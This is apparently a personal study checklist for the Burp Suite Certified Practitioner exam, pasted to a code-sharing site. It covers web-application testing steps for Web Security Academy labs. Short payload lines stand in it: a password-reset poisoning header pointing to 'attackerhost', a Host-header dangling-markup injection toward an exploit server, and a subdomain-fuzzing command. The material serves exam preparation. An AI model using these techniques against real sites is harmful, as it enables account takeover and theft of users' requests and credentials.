Untitled

mail@pastecode.io avatar
unknown
markdown
a year ago
5.9 kB
3
Indexable
Never

Write about what kind of website functions are corelated with certain vulnerabilities Important page: https://github.com/DingyShark/BurpSuiteCertifiedPractitioner#http-request-smuggling

  1. THE MOST IMPORTANT THINGS TO DO AT START:

    1. I AM NOT HACKING NOT PWNING I DO NOT HAVE TO FINISH THIS
    2. Im curious about how these things works. I want to understand it!!!
    3. **Check the source code of the pages (including / comment section, forgot password etc.)
    4. Check how the actions behave ->
      1. Is something affecting cookie? -> maybe we can use it to escalate privileges. Recently I have situation, when the forgot password utulity was changing the username in the cookie and if i was logged in as legitemate user I could change username to administrator
      2. Is there prototype pollution? look if we can perform xss attack or make the request being rewrited in the search/comment section. (use DOM intruder)
      3. Is the cache in the headers? - If you see miss/hit we can be sure that there may be something
      4. Can you enumerate usernames in the forgot password section?
      5. Take a note when you find something but you don't know how to use it - write how it works, what do you see
      6. Is X-Frame-Options set up to sameorigin? if not you can try clickjacking
      7. Is there CORS header setup? - you can try to exfiltrate data via ajax/fetch
    1. check for xss, manually files + use burp built in browser/dom invader
    2. remember of comments section
    3. canonical
  2. perform dir busting and subdomain busting including graph ql endpoints

  3. check password reset things nextly bruteforce authentication

  4. run param mainer

  5. XXE - dns lookup

app overlook

Check what's inside application, play with it.

  • Can you enumerate usernames(more than carlos)?:
    • different responses
    • time
    • password reset thing

First user

  • XSS all locations
  • Dirbusting, register page and other.
  • Forgot password
  • CSRF
  • Request Smuggling
  • Web cache poisoning

dirbusting

Firstly we want to look for hidden files, directories that may contain useful informations.

  1. Use raft-small-words - it contains git etc. with extensions like .txt .php .html .js
  2. Test the API for graphQL [[GraphQL#finding graphql endpoints]]
  3. Use burp -> target -> enagement tools -> Discover Content

subdomains enumeration

fuff -u https://FUZZ.lab.id -w /usr/share/wordlist/seclists/Discovery/DNS/subdomains-top1million-20000.txt

auth bypass

  • Host validation bypass via connection state attack [[Authorization bypass]]

sending data

JSON

  • Try to inject more than one paramterer for example { "userId": 1, "userId": 2 }
  • check if the parameter can be string or int
  • check if the parameter can be object {"userId": {"blabla":1}}
    • if it is an object check if it's vulnerable to prototype pollution.
  • Try to change Content-Type and send different content
    • `Content-Type: www/x
  • perform test for race conditions I NNNEEDDD LINNKK HEREEE
  • SQL/NOSql injection
  • ** IF THERE IS roleID TRY USE INTRUDER AND A LOT OF DIFFERENT NUMBERS **

POST general

  • check how it react to bad characters (use special characters)
  • add additional parameters like another username
  • remove parameter like password etc. and observe behaviour
POST / HTTP/1.1 Host: xyz Content-Length... csrf=blabla&username=carlos&username=admin&.....

CSRF

Where it can be:

  • form submission (csrf token not needed or not tied to session)
  • ajax (xmlhttprequest) or fetch can be used when the proper CORS is set up

XSS

Location to search

  • search query - remember USE REPEATER FOR SEARCH QUERY IN ORDER NOT TO ENCODE CONTENT
  • login page with autocomplete fields [[Reflected XSS main payloads#credentials steal]]
  • error pages - when we enter page like /404 and we get info /404 not found, it may be vulnerable to XSS, also USE REPEATER
  • dom elements
  • web cache poisoning
  • request smuggling h2.c0 [[Smuggling HTTP 2.0#H2.CL]]

Capture other users requests

  • CSRF (post data)
  • request smuggling
    • cookie steal [[Smuggling HTTP 1.1#cookie steal]]
    • frontend request rewriting [[Smuggling HTTP 1.1#Identyfing frontend request rewriting]]
    • if there is no cache poisoning but some headers are reflected on the page [[Smuggling HTTP 1.1#xss via user agent]]
    • H2 queue posioning [[Smuggling HTTP 2.0#Response queue poisoning via H2.TE request smuggling]]
    • ** REMEMBER THAT SOMETIMES YOU NEED TO FIND OTHER ENDPOINT THAN / (/ can be not vulnerable) **
    • Request smuggling urls maybe : /admin /my-account etc, some svg file etc.

Change email

#todo Race condition in changing email or other parameters single-point rac econdition

http request poisoning

in progress

Password Reset

headers

X-Forwarded-Host: attackerhost 

or similar headers:

X-Host
X-Forwarded-Server
X-HTTP-Host-Override
Forwarded

or

X-Forwarded-Scheme: http
X-Forwarded-Host: attackerhost

We can use ** Param Miner Guess Headers ** -> but remember ** use it at the password reset page **

  • Host header change:
Host: YOUR-LAB-ID.web-security-academy.net:arbitraryport
Host: YOUR-LAB-ID.web-security-academy.net:'<a href="//YOUR-EXPLOIT-SERVER-ID.exploit-server.net/?

and send

GET /?/login'>[…]

tokens

timestamp

Try to send multiple request of password reset at once. What to do:

  • Grab another session cookie along with CSRF token
  • For testing send two POST requests in pararell to get token for the same user.
  • Check the email
  • POC [[Password reset race condition]]

prototype pollution

Open burp browser: Proxy -> Intercept -> Open Browser Open Chrome Dev Tools -> goto Dom Invader -> Reload page

comments about last trials

  • I didn't check the page sources properly
  • I wasn't curious enough about how things works
  • I WASN'T CALM, I WAS AGITATED - THIS IS MAIN REASON WHY I FAILED